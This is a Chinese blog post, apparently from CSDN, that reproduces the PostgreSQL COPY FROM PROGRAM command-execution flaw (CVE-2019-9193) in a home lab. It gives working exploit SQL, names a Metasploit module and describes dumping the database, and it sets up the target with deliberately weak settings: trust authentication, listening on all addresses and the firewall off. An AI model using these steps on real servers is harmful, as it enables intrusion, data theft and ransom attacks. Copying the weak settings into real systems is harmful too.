漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)及被勒索回忆

最新推荐文章于 2023-12-23 00:32:38 发布
最新推荐文章于 2023-12-23 00:32:38 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 黑客技术 文章标签: postgresql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31042199/article/details/119716859
版权

为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下:

漏洞名称CVE-2019-9193
漏洞影响PostgreSQL版本9.3-11.2
漏洞影响平台windows+Linux+Mac OS
测试硬件环境win10(家庭版)
虚拟机版本ubuntu18.04
本次PostgreSQL版本10.18
win10与ubuntu虚拟机连接方式桥接
kali攻击机ip192.168.31.68
靶机ip192.168.31.9
网关192.168.31.0

1.在本地windows10(家庭版)安装ubuntu18.04虚拟机

windows10现在已经支持以应用的放式安装Linux虚拟机,具体就是在microsoft store搜索ubuntu,如图:

2.安装postgresql数据库

apt update

apt install postgresql postgresql-contrib

安装完会自动启动,如果没有自动启动请根据报错参考其他,我这边当时报了 /var/lib/postgresql/10/main权限不足导致PostgreSQL启动失败,通过命令
chmod 700 -R /var/lib/postgresql/10/main解决,最后验证pg服务是否正常运行
service postgresql status

3.配置数据远程登录权限

在文件pg_hba.conf(一般为/etc/postgresql/pg_hba.conf)末尾添加
host all all 192.168.31.0/24 trust
添加后大概为:
# replication privilege.
local replication all peer
host replication all 127.0.0.1/32 md5
host replication all ::1/128 md5
host all all 192.168.31.0/24 trust

还需修改postgresql.conf中的
#listen_addresses = 'localhost'为
listen_addresses = '*'即去掉注释,允许监听所有主机

4.win10与虚拟机桥接

4.1 安装Hyper-V

由于win10家庭版是没有自带Hyper-V(微软实现的类似VMware的虚拟技术),需要手动安装,复制下面代码到txt记事本文件中,并修改文件名为Hyper-V.cmd

pushd "%~dp0"

dir /b %SystemRoot%\servicing\Packages\*Hyper-V*.mum >hyper-v.txt

for /f %%i in ('findstr /i . hyper-v.txt 2^>nul') do dism /online /norestart /add-package:"%SystemRoot%\servicing\Packages\%%i"

del hyper-v.txt

Dism /online /enable-feature /featurename:Microsoft-Hyper-V-All /LimitAccess /ALL找到文件,右键点击,选择“以管理员身份运行”,运行后,自动打开命令行执行相关命令,执行到最后根据提示让输入Y或N,输入Y,重启电脑...
重启成功后,Hyper-V安装完成。
详情参考:win10 家庭中文版没有Hyper-V,这样安装一步搞定

4.2 创建桥接

在开始里搜Hyper-V找到管理器,如图:

如果找不到Hyper-V管理器,建议再重启一下电脑
详情参考:https://blog.csdn.net/sinat_36203615/article/details/77969800创建网桥,并桥接,桥接成功如图:

5.验证网络连通性

配置到这里kali(渗透主机)应该就可以登录postgresql虚拟机了,
psql -h 192.168.31.9 -U postgres -p 5432
但是我这边还是连不上pg服务,这里需要注意一下你的虚拟机ubuntu18.04上启动的pg服务,是否是在5432默认端口,我通过查看配置文件发现是在5433端口(由于win10上也装了pg数据库,端口占用就自动换了吧),然后再次连接:
psql -h 192.168.31.9 -U postgres -p 5433
依然失败!最后发现是win10的防火墙拦截导致,关闭防火墙即可

6.复现[CVE-2019-9193]漏洞

先手动感受一波:
psql -h 192.168.31.9 -U postgres -p 5433
postgres=# DROP TABLE IF EXISTS cmd_exec;
DROP TABLE
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'whoami';
COPY 1
postgres=# SELECT * FROM cmd_exec;
cmd_output
------------
postgres
(1 行记录)
此时已经成功的执行了whoami命令,接下来用metasploit工具走一波:
使用exploit/multi/postgres/postgres_copy_from_program_cmd_exec模块
参数配置如图:

建立session通道后效果如图:
通过pg_dump命令对postgres数据库备份到/tmp/hacktest.sql文件

再接下来就是删除数据,留下比特币的支付id,就如我曾经遭遇过的一样:

原文出自: http://pyspiderking.cn/index.php/2021/08/15/pg-cve-2019-9193/

干了这杯酒
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
m0_48520508的博客
01-20 871
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1218
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 540
vulhub靶场复现postgresql
PostgreSQL 高权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 1017
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1750
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更高建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
PostgreSQLpostgresql-13.5-1-osx.dmg)
11-20
PostgreSQLpostgresql-13.5-1-osx.dmg)适用于Mac OS X PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象关系型数据库...
PostgreSQLpostgresql-14.2-2-windows-x64.exe)
05-05
PostgreSQLpostgresql-14.2-2-windows-x64.exe),适用于Windows系统:PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象...
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3521
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193PostgreSQL 高权限命令执行漏洞复现
最新发布
m0_69801663的博客
12-23 1103
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 828
PostgreSQL任意命令执行CVE-2019-9193
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 582
康复训练
P7 利用Vulhub复现漏洞 -PostgreSQL 高权限命令执行漏洞CVE-2019-9193
在下小黄的博客
03-29 412
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P7 利用Vulhub复现漏洞 -PostgreSQL 高权限命令执行漏洞CVE-2019-9193) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月29日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、Vulhub靶机 PostgreSQL 高权限命令执行漏洞Vulhub 复现漏洞原理环境准备 Vulhub 复现 PostgreSQL 高权限命令执行
【vulhub】PostGresql高权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 816
CVE-2019-9193
PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2713
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要高权限 所以要先弱口令爆破之后,然后查看是否是高权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
CVE-2019-9193 复现
qq_41252520的博客
08-24 862
CVE-2019-9193PostgreSql 命令执行复现 0x0 简介 PostgreSQL作者称为Post-Gres-Q-L,是开源的功能强大的关系型数据库,支持SQL语法。在9.3版本中增加了一个COPY TO/FROM PROGRAM功能。该功能允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 0x1 影响版本 9.3-11.2 0x2 环境搭建 这里使用的是vulhub环境,进入到vulhub−master/postgres/CVE−20
PostgreSQL JDBC Driver RCE&任意文件写入漏洞CVE-2022-21724】
Armandhe的博客
05-10 3282
PostgreSQL JDBC Driver RCE&任意文件写入漏洞CVE-2022-21724】
postgresql数据库--psql、pg_dump命令带密码执行sql语句
04-30
PostgreSQL是一种开源的关系型数据库,它提供了多种管理工具来操作数据库,其中包括psql和pg_dump命令。 psql是一种命令行工具,可以用来与PostgreSQL数据库进行交互。它不仅能够执行SQL语句,还可以支持交互式命令...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值